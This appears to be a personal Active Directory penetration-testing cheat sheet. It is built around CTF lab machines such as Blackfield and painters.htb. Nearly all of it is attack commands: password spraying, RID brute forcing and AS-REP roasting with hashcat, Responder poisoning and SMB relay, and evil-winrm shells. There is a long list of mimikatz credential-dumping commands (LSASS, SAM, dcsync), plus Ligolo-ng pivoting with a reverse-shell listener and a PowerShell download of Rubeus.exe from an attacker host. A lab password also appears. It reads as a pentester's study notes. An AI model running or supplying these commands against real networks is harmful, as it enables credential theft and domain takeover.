Useful Resources
Initial Access
Password Spraying
Password Spraying via Sprayhound
- Checks badpwdcount attribute only in the domain policy
Additional Resources
Rid Brute via SMB
Requires: Guest read access to IPC$ (Remote IPC) SMB File Share
nxc smb 10.10.10.192 -u 'guest' -p '' --rid-brute > sid.txt
cat sid.txt | awk -F': ' '{print $2}' | awk '{print $1}' | sed 's/[DOMAIN]\\//' > users.txt
GetNPUsers.py [DOMAIN]/ -usersfile users.txt -format hashcat
hashcat -m 18200 creds.txt /usr/share/wordlists/rockyou.txt
LDAP Enumeration
ldapsearch -x -H ldap://BLACKFIELD -s base namingcontexts (Domain Contexts)
ldapsearch -x -H ldap://BLACKFIELD -D 'CN=support,CN=users,DC=BLACKFIELD,DC=local' -W -b 'DC=BLACKFIELD,DC=local' '(objectClass=user)' (Search Users)
ldapsearch -H ldap://192.168.110.55 -x -D "web_svc@painters.htb" -W -b "dc=painters,dc=htb" "(msDS-AllowedToDelegateTo=*)" msDS-AllowedToDelegateTo (Constrained Delegation)
- Old tool however useful if Bloodhound.py isn’t working as intended.
Additional resources
SMB Enumeration
nxc smb [IP] --shares
Additional Resources
Web Application Vulnerabilities
Additional Resources
Integrated DNS Dump
Any user in Active Directory can enumerate all DNS records in the Domain or Forest DNS zones, similar to a zone transfer.
Additional Resources:
Domain Enumeration
Impacket (via Python)
- GetADUsers.py
Bloodhound
curl -L https://ghst.ly/getbhce | docker compose -f - up
Additional Resources
Additional Resources
python3 bloodhound.py -u "support" -p "#00^BlackKnight" -c ALL -d BLACKFIELD.local -ns 10.10.10.192 -dc dc01.BLACKFIELD.local
proxychains bloodhound-python -u "web_svc" -d 'painters.htb' -dc 'dc.painters.htb' --dns-tcp -c ALL -v -ns 192.168.110.55 [proxychains equivalent]
Poisoning and Relay
Responder
- IPv6/IPv4 LLMNR/NBT-NS/mDNS Poisoner and NTLMv1/2 Relay.
hashcat -m 5600 --force -a 0 responder.hashes /usr/share/wordlists/rockyou.txt
/opt/tools/Responder/ (location of Responder)
SMB Relay
[SMB Relay]
nxc smb [IP] --gen-relay-list relay.txt
Local Privilege Escalation
Resources
Lateral Movement
Smbexec
WinRM
Evil-WinRM - ultimate WinRM shell for hacking/pentesting
gem install evil-winrm
evil-winrm -i <IP> -u <username> -p <password>
evil-winrm -i <IP> -u <username> -H <ntlm hash>
evil-winrm -i <IP> -u <username> -k
## Run Powershell Commands
whoami
ipconfig
Get-Process
## Upload and Download Files
upload /local/path/to/file /remote/path
download /remote/path/to/file /local/path
## Run Powershell Scripts
upload /local/path/to/script.ps1 /remote/path/script.ps1
powershell -File /remote/path/script.ps1
Mimikatz
#Dump LSASS:
mimikatz privilege::debug
mimikatz token::elevate
mimikatz sekurlsa::logonpasswords
#(Over) Pass The Hash
mimikatz privilege::debug
mimikatz sekurlsa::pth /user:<UserName> /ntlm:<> /domain:<DomainFQDN>
#List all available kerberos tickets in memory
mimikatz sekurlsa::tickets
#Dump local Terminal Services credentials
mimikatz sekurlsa::tspkg
#Dump and save LSASS in a file
mimikatz sekurlsa::minidump c:\temp\lsass.dmp
#List cached MasterKeys
mimikatz sekurlsa::dpapi
#List local Kerberos AES Keys
mimikatz sekurlsa::ekeys
#Dump SAM Database
mimikatz lsadump::sam
#Dump SECRETS Database
mimikatz lsadump::secrets
#Inject and dump the Domain Controler's Credentials
mimikatz privilege::debug
mimikatz token::elevate
mimikatz lsadump::lsa /inject
#Dump the Domain's Credentials without touching DC's LSASS and also remotely
mimikatz lsadump::dcsync /domain:<DomainFQDN> /all
#Dump old passwords and NTLM hashes of a user
mimikatz lsadump::dcsync /user:<DomainFQDN>\<user> /history
#List and Dump local kerberos credentials
mimikatz kerberos::list /dump
#Pass The Ticket
mimikatz kerberos::ptt <PathToKirbiFile>
#List TS/RDP sessions
mimikatz ts::sessions
#List Vault credentials
mimikatz vault::list
Additional Resources
Network Pivoting via Ligolo-ng
./agent -connect 10.10.14.5:443 -ignore-cert
sudo ./proxy -selfcert -laddr 0.0.0.0:443 -v
session
start
sudo ip route add 192.168.110.0/24 dev ligolo
listener_add --addr 0.0.0.0:1234 --to 0.0.0.0:4444 (open port on DMZ machine for reverse shell)
powershell -Command "Invoke-WebRequest -Uri 'http://192.168.110.51:1235/Rubeus.exe' -OutFile 'Rubeus.exe'"
Additional Resources
Exfiltration (Domain Controller)
Extraction of ntds.dit
Exploitation of Monitoring Systems
Exploitation of Monitoring Systems
- Zabbix Agent
- Scripts in Zabbix can be used to perform custom monitoring checks, collect and process data from external sources, and automate tasks based on monitoring events.
- Zabbix SSO bypass
Active Directory Tools
curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh (install Rust)
source $HOME/.cargo/env
pipx install git+https://github.com/Pennyw0rth/NetExec
PowerView (Deprecated since 2021)
. .\powerview.ps1
Import-Module C:\Temp\PowerView.ps1
NSE --script smb-os-discovery,smb-enum-shares,smb-enum-users,smb-vuln*
SMB Enum4Linux SMBMap smbclient smbclient.py (Impacket) NetExec - Cheatsheet SMB Enumeration Cheatsheet
python3 -m pipx install impacket
- **PSExec**
- Shell access via SMB shares (Pass the Hash)
- **GetNPUsers**
- Kerberos Pre-authentication disabled (ASREPRoasting)
smbclient.py -k -no-pass PAINTERS.HTB/Administrator@dc.painters.htb -debug
wmiexec.py -k -no-pass PAINTERS.HTB/Administrator@dc.painters.htb
psexec.py -k -no-pass Administrator@dc.painters.htb -dc-ip 192.168.110.55 -debug (sometimes don't need the domain)
smbexec.py administrator@dc.painters.htb -k -no-pass -debug
- [smbexec](https://book.hacktricks.xyz/windows-hardening/lateral-movement/smbexec)
Pywerview - Linux AD Enumeration
Empire - Post-exploitation Framework
Resources
Article Information
- Author: Tony Wu
- URL: https://qwutony.github.io/wiki/003-active-directory-penetration-testing/
- License: Free to share - NonCommercial - NoDerivatives - Attribution required (Creative Commons BY-NC-ND 4.0 License)